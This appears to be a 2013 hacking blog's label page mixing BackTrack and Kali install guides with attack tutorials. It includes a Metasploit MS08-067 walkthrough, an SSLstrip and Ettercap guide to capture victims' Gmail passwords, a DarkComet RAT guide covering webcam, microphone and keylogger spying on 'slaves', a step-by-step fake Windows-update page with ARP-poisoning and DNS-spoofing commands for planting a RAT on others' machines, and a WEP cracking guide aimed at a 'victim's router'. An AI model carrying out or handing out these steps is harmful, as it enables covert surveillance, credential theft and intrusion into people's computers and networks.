Showing posts with label Backtrack. Show all posts
Showing posts with label Backtrack. Show all posts

Monday, 23 December 2013

Installing BackTrack 5 R1

What is BackTrack5
  • BackTrack is an operating system based on the Ubuntu GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm. The current version is BackTrack 5, code name "Revolution."

  • BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option

  • BackTrack includes many well known security tools including
    • Metasploit integration
    • RFMON Injection capable wireless drivers
    • Aircrack-NG
    • Kismet
    • Nmap
    • Ophcrack
    • Ettercap
    • Wireshark (formerly known as Ethereal)
    • BeEF (Browser Exploitation Framework)
    • Hydra
  • BackTrack Download
     

Create a New Virtual Machine. (See Below)

 New Virtual Machine Wizard
  • Instructions:
    1. Select the radio button "Installer disc image file (iso):"
    2. Click the Browse Button.
    3. Navigate to where you BT5 iso is located.
    4. Select the BT5 iso
    5. Click Next
     
     
New Virtual Machine Wizard
  • Instructions:
    1. Guest operating system:  Linux
    2. Version: Ubuntu
    3. Select Next
    New Virtual Machine Wizard
    • Instructions:
      1. Virtual machine name: BackTrack5R1
      2. Location: In my case, I saved it to my USB drive, located in H:\BackTrack5R1\
      3. Select Next
        

        



















    New Virtual Machine Wizard
    • Instructions:
      1. Maximum disk size (GB): For our purposes use 20GB.
      2. Radio Button:  Store virtual disk as an single file
      3. Select Next 
       



    New Virtual Machine Wizard
    • Instructions:
      1. Click on the "Customize Hardware..." button

    New Virtual Machine Wizard
    • Instructions:
      1. Click on Memory (which is highlighted in blue)
      2. Click on 512 MB. (Recommended is 1024 MB, but not really needed for lab purposes).
      3. Do not click on OK
       
     New Virtual Machine Wizard
    • Instructions:
      1. Click on Network Adapter
      2. Click on "Bridged: Connected directly to the physical network"
      3. Click OK. 

    Click on the Finish button.
    • Instructions:
      1. Click the Customize Hardware... button
       
    Start the Boot Process
    • Instructions:
      1. Press Enter

    BackTrack Live CD
    • Instructions:
      1. Select "BackTrack Text - Default Boot Text Mode"
      2. Press <Enter>
       
    Bring up the GNOME
    • Instructions:
      1. Type startx
     
    Install BackTrack to Harddrive


    Install BackTrack to Harddrive
    • Instructions:
      1. Option 1: Double Click on the icon labeled "Install BackTrack"
        • OR
      2. Option 2: System --> Administration --> Install BackTrack Live 
       
    1. Select Language
      • Instructions:
        1. In my case: English.
        2. Click Forward
    2. Select Language
      • Instructions: (In my case)
        1. Region: English
        2. Time Zone: United States (Chicago)
        3. Click Forward
    3. Select Language
      • Instructions: (In my case)
        1. Suggested option: USA
        2. Click Forward
    4. Select Language
      • Instructions:
        1. Select "Erase and use the entire disk"
        2. Select Forward
      • OR Note (This is optional)
        1. If you select "Specify partitions manually", then you can create you own file systems layout.
          • /     - 2000 MB
          • /boot - 500  MB
          • swap  - 1280 MB (Double Memory)
          • /tmp  - 1000 MB
          • /home - 2000 MB
          • /var  - 2000 MB
          • /usr  - 3000 MB
          • Then use the rest as needed using volume management.

    5. Select Language
      • Instructions:
        1. Click on Install
    6. Informational
      • Note(FYI):
        • The installation process will take between 10 and 45 minutes depending on your systems resources.
    7. Consistency Reboot
      • Instructions:
        1. Click on Restart Now

    Section 3. Login to BackTrack
    1. Edit Virtual Machine Settings
      • Instructions:
        1. Virtual Machine --> Virtual Machine Settings...
    2. Edit CD/DVD (IDE)
      • Instructions:
        1. Select CD/DVD (IDE)
        2. Click on Use physical drive:
          • Select Auto detect
        3. Click the OK Button
    3. Login to BackTrack
      • Instructions:
        1. Login: root
        2. Password: toor

    4. Bring up the GNOME
      • Instructions:
        1. Type startx
    5. Bring up a console terminal
      • Instructions:
        1. Click on the Terminal Console Icon
    6. Change root's password
      • Instructions:
        1. passwd root
        2. Use our standard class password
    7. Create a student account and set password
      • Instructions:
        1. useradd -m -d /home/student -c "Security Student" -s /bin/bash student
        2. passwd student
        3. Use our standard class password
     

      Sunday, 27 October 2013

      Install backtrack on your smart phone - mobile hacking

      today we are going to see How to install backtrack  5 on Smartphones and tablets which run on android.For this we have certain Required. Ofcourse the main will be the Android smartphone with 2.1+. Though I recommend 4.0+.In my case ill be using Micromax a110 smartphone. 





      Requirements:

      1.Back | track 5 Arm architecture which can be downloaded from the official website of the Back | track Here.

      2.A smartphone/tablet which needs to be rooted since it requires root permission to run certain scripts. (micromax a110 as example)
      3.Following Android Apps:
      BUSYBOX : It acts like a installer and uninstaller.it needs root permission to run.it has gpu cores and can  run linux kernals on android . Link
       
      Superuser: This app just grants a superuser power to your phone just like “su” does for linux. Link
       
      Terminal Emulator is app that runs a terminal console in android .Link
       
      AndroidVNC is a tool for viewing VNC in Android. Link

      Installation:

      1.Extract the backtrack folder “BT5-GNOME-ARM” to folder named “BT5” on the root of sd.That’s the top level of the SD card. 
      2.Open up the Terminal Emulator 
      3.Type the command “cd sdcard/BT5”

      4.Run this command and you will see root@localhost.
       su
      sh bootbt
       

      5. Now lets run Backtrack GUI with VNC viewer 

       startvnc
      h

      6. Open android vnc
      Nickname : BT5
      Password : toortoor
      Address : 127.0.0.1
      Port : 5901
       7.Click the connect Button and Boom here is your Pentest machine 
       
       
       
       
       

      Tuesday, 7 May 2013

      [Metasploit Tutorial] Hacking Windows XP using IP Addres

      Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.  video tut on this article soon...


      Details about Server Service Vulnerability(MS08-067):
      Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

      The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

      A malicious request to vulnerable system results in complete compromise of vulnerable computers.
      This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

      Exploiting the MS08-067 using Metasploit:

      Requirements:


      • VirtualBox
      • Backtrack 5
      • Target OS(XP)
      Step 1:

      Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

      If you don't know how to create virtual machines , then please read this VirtualBox Manual.

      Step 2: Find the IP address of Target
      Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

      Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

      Step 3: Information Gathering
      Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

      Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


       Step 4: Metasploit
      Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

      The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

      Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.
       
      We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

      Step 5: Set Payload
      As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

      Step 6: Options
      Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

      Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

       Step 7: Exploiting
      Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.
       Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

      notice remember this is only for educational purpose dont miss use it  its dangerous for you and for other learn it enjoy it do it ethically :) have fun  and yeha subscribe my channel www.youtube.com/way2hackintosh   

      Tuesday, 23 April 2013

      How To Hack Using Man In The Middle Attack | SSL Hacking

      Hello hacker Friends this is one of the most common attack that most hacker do to amaze people and i am gonna make it simple for you all so that you can enjoy it and try to learn this is attack so are you all ready so lets start . every one know about http attack but this is SSL means https attack nice trick  so lets begin .. :D u can watch my video on youtube ;) 

      Tools Needed:



    •  SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial



    •  Ettercap to carry out mitm attacks..

    • Steps to Perform MITM Attack

      1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok 


      2.Now select the victim’s IP and click open



      3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 




      4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2


      5. Now select mitm-arp poisoning and click ok as shown 

       6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTP and not HTTPS Hence we are able to get the User id ,passwords 

      way2h security steps:-
      1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

      2. Always check the SSL certificate before doing an online transaction

      Stay Safe.Enjoy !!
      For Educational Purpose Only

      Monday, 15 April 2013

      Kali Linux 1.0.2 Download ISO Image. From Creater Of BackTrack (way2h)





      The most versatile, The most awaited and advanced penetration testing Linux distribution, Kali Linux has been released from the creator of BackTrack Linux. Today, We will discuss its features

        Kali Linux is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged.

       According to Offensive Security, Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.After a year of silent development, Offensive Security is proud to announce the release.

      Being based on Debian (Debian Wheezy), Kali also uses its parent distribution’s installation program, the first Debian-based distribution I have reviewed in a while that uses the Debian Installer (DI). What that means is that Kali gives you more features (during installation) than BackTrack, Ubuntu or any other
       distribution derived from Ubuntu. This screen shot shows the installer’s disk partitioning options.

       The Kali Linux ARM Architecture images work like charm on Samsung ARM Chromebook, Raspberry Pi, ODROID U2 / X2 and SainSmart SS808.

      • What's New in Kali Linux:
      • 300 penetration testing tools.
      • FHS (Filesystem Hierarchy Standard) compliant.
      • Enhanced and vast wireless device support.
      • Custom kernel patched for injection.
      • GPG signed packages and repos.
      • Multi-language and completely customizable.
      • ARMEL and ARMHF support.
      • Kali is currently available for the following ARM devices:
        • rk3306 mk/ss808
        • Raspberry Pi
        • ODROID U2/X2
        • Samsung Chromebook

      Wednesday, 13 March 2013

      Kali Linux Released by BackTrack Team With 300+ Hacking Tools

      Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.

      After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.


      Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux. Trying to list all the new features and possibilities that are now available in Kali would be an impossible task on this single page. We therefore invite you to visit our new Kali Linux Website and Kali Linux Documentation site to experience the goodness of Kali for yourself.


      We are extremely excited about the future of the distribution and we can’t wait to see what the BackTrack community will do with Kali. Sign up in the new Kali Forums and join us in IRC in #kali-linux on irc.freenode.net and help us usher in this new era.



      Thursday, 7 March 2013

      DarkComet Features & How To Use Them


      DarkComet Features & How To Use Them


      What is DarkComet?

      DarkComet-RAT (Remote Administration Tool) is software design to control in the best condition and confort possible any kind of Microsoft Windows machine since Windows 2000.
      This software allow you to make hundreds of functions stealthly and remotely without any kind of autorisation in the remote process.
      This software is a long time project,started the August 2008,DarkComet-RAT is now one of the best and one of the most stable RAT ever made and totally free.

      What features does this RAT have?

      DarkComet has many, many features. Below, I will list the most important ones, & what they are used for. The features are under different categories. I will post a picture of the categories, along with each feature that is inside of it.

      1. System Info
      • System Monitor
      • Computer Info
      • Trace Map
      ....


      System Monitor: The System Monitor feature allows you to monitor the system which you have infected. From here you can see the CPU Usage & the Ram Usage of your slave.

      Computer Info: In Computer Info, you can see various amounts of information having to do with Server Connection, Server General Information, BIOS Information & Server Settings Information.

      Trace Map: Here, you can look up a lot of information about where you slave lives. Some of the data that you can see is the IP Address, the Longitude & Latitude, the Timezone & various other pieces of information.

      2. Fun Functions
      • Fun Manager
      • Piano
      • Message Box
      • Microsoft Reader
      • Remote Chat


      Fun Manager: Here you can do various factors to annoy your slave, such as open & close the CD tray, hide clock, disable task manager, hide desktop & many more other features.

      Piano: Here, you can click on a virtual keyboard, & what ever key you click, it will be played to your slave.

      Message Box: Here you can enter a title & some text, & it gets sent to your slave as a message box.

      Microsoft Reader: Here you can input text, & when you click "Read", it is read to your slave in Microsoft's default voice.

      Remote Chat: Here, you have the opportunity to remotely talk to your slave. Once you sned a message, a chat box shows & your slave has the option to send a message back, or simply close & ignore it.

      3. File Manager
      • Explore Files
      • Search For Files


      Explore Files: Here, you can go through your slaves files, & you can even receive files from their computer & send files from your computer to theirs.

      Search For Files: Here, you can search for a specific file name, type & where it is stored.

      4. Spy Functions
      • Webcam Capture
      • Sound Capture
      • Remote Desktop
      • Keylogger



      Webcam Capture: Here you can see through your slaves webcam, if they have one.

      Sound Capture: Here you can hear through your slaves microphone, if they have one.

      Remote Desktop: Here, you can see everything that they are doing, & even take over & control the computer yourself.

      Keylogger: Here, it stores everything that they have typed, while you have been offline. When you are online, & they are connected to the DarkComet client, it will not record logs. If you want, you can set the logs to be sent to a webhost.

      5. Update Server
      • From Url
      • From File


      From Url: Here, you can update your server via a Url (Direct Link). You may want to update your server, incase it becomes detected by anti-viruses, & you have re-crypted it.

      From File: Here, you can update your server by sending a file on your computer, to theirs. You may want to update your server, incase it becomes detected by anti-viruses, & you have re-crypted it.


      All credits to this tutorial go to Text. It has taken me around an hour to make this tutorial. The least you can do is say thanks.

      Get your rat onto a pc that's on the same network.

      This is how to get someone to download your rat if you're on the same network

      This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..

      Start by downloading backtrack 5 and burning the iso.

      Code:
      http://www.remote-exploit.org/backtrack_download.html

      Boot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
      Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.

      Code:
      <body>
      <p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
      <p align="center">
      <input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
      </p>
      <p align="center" class="style2"></p>
      <p>&nbsp;</p>
      <form id="form1" name="form1" method="post" action="/upgrade.exe">
      <label for="D"></label>
      </form>
      <p align="left" class="style4">&nbsp;</p>
      </body>
      </html>

      Now copy your rat into the same directory and name it windowsupdate.exe

      Start apache

      Code:
      /etc/init.d/apache2 start

      open firefox and navigate to 127.0.0.1. Your fake update page should show up.

      Now set up the dns_spoofing configuraton

      Code:
      echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

      Replace 192.168.1.101 with your own ip (ifconfig)

      Use nmap to find your target ip

      Code:
      nmap -sP your_subnet/24

      Now arp-poison with ettercap using the dns_spoof plugin.

      Code:
      ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof

      replace 192.168.1.102 with your target's ip.
      replace 192.168.1.1 with your gateway ip.
      replace wlan0 with your interface.

      If you want to target everyone on the network you can use the following command.

      Code:
      ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof

      Now every time they try to navigate to a web page, they will be redirected to your update page.
      Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

      Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.

      Code:
      ipconfig /flushdns

      This will let them browse again.


      Wednesday, 6 March 2013

      WEP Cracking with Backtrack

      First, you will need to have Backtrack 5 (LINK)
      *** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

      Login: root
      Password: toor


      Once logged in, type in: startx
      BT5 is now set up, heres the following.
      ==

      WEP CRACK GUIDE


      1. Open konsole and type the following to start up network connections.

      /etc/init.d/networking start


      2. Now we are going to put the network card into monter mode by typing the following.

      airmon-ng

      (You will find your Interface here)

      3. So first start up the scan

      airmon-ng start wlan0 or 1

      (depends on what it reads your card as, replace as needed)

      4.Lets spoof your MAC address first by typing this next command.

      ifconfig wlan1 down
      macchanger -r wlan1
      ifconfig wlan1 up


      This will make it so we change our MAC address to the computer we are connecting to

      5.Time to start finding our victims router, type in konsole.

      airodump-ng mon0

      This will show the list and once you find one that suits your interest, Continue.

      6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

      airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

      example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0


      7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:

      aireplay-ng -1 1 -a The BSSID of the router, then the interface.
      example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0


      8. Almost done, we just need to contune the ARP cycle, open another konsole and type:

      aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.


      Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.

      9. Time to start cracking that cap file :D Open a new konsole and type.

      aircrack-ng -b (bssid) (file name)-01.cap
      example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap


      10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)

      Tuesday, 5 March 2013

      How to install BackTrack 5 using VirtualBox

      Install BackTrack 5 using VirtualBox

      1.Download the latest version of VirtualBox from Here
      2.Download the BackTrack 5 ISO from Here
      3.After installing VirtualBox, let's launch it and try to set up a new Virtual Machine:

      3.Click New –>Continue –> Next
      4.Name (Select Ubuntu 64Bit) –> Next
      5.Select Ram (Assign at least 30%) i suggest 1gb if u have   –> Next

      6.Check “Boot Disk” à Create New Hard Disk

      7.Continue –> “Dynamically Expanding Storage” –> Choose Location –> Size (Minimum of
      Continue –> Done
      Your disk configuration should look similar to this
      8.Click Settings (We are going to leave mosts defaults on for everything for this How-To)

      9.Click Storage à With “IDE Storage” Selected click the Drive Icon with the plus sign on it à
      10.Choose Add CD/DVD a Choose Disk a       Navigate to the BT5 ISO you had downloaded if u dont have backtrack download from here


      11.Click Display and assign at least 64MB
      Click Ok

      12 .Open Terminal and enter the Following
      VboxManage setextradata “Backtrack” “CustomVideoMode1″ “1100x740x16″

      13.Click Start
      14.Click inside the window –> Tab –> Choose “Backtrack Text”

      Once the boot sequence completes you will already be in a root shell.

      15.Once Backtrack Launches Double Click the “Install Backtrack Icon”

      16.After the setups is finished, shut down Backtrack.

      17.Click Settings in Virtual Box Manager à Click Storage à With “IDE Storage” selected remove
      the Live-ISO distribution

       Click Start to launch Backtrack

      BackTrack 5 R3 Released

      Backtrack is one of the best Linux distribution for penetration testing, it helps ethical hackers to perform the penetration testing on the network, web application, wireless network, RFID and many more. Backtrack 5 was the last released but now backtrack 5 R3 has been released by the backtrack community. 


      DOWNLOAD >>

      Monday, 13 August 2012

      BackTrack 5 R3 Released For Download

      The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.


      For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.